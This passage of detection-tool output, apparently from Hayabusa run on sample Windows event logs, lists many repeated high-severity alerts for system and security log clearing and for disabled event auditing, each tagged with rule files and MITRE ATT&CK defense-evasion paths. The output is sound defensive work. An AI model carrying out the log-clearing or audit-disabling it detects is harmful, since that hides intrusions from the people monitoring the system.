cleared.evtx 2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,Evas,System 
Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,Evas,System 
Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,Evas,System 
Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx 2021-10-26 03:30:36.515 
+09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
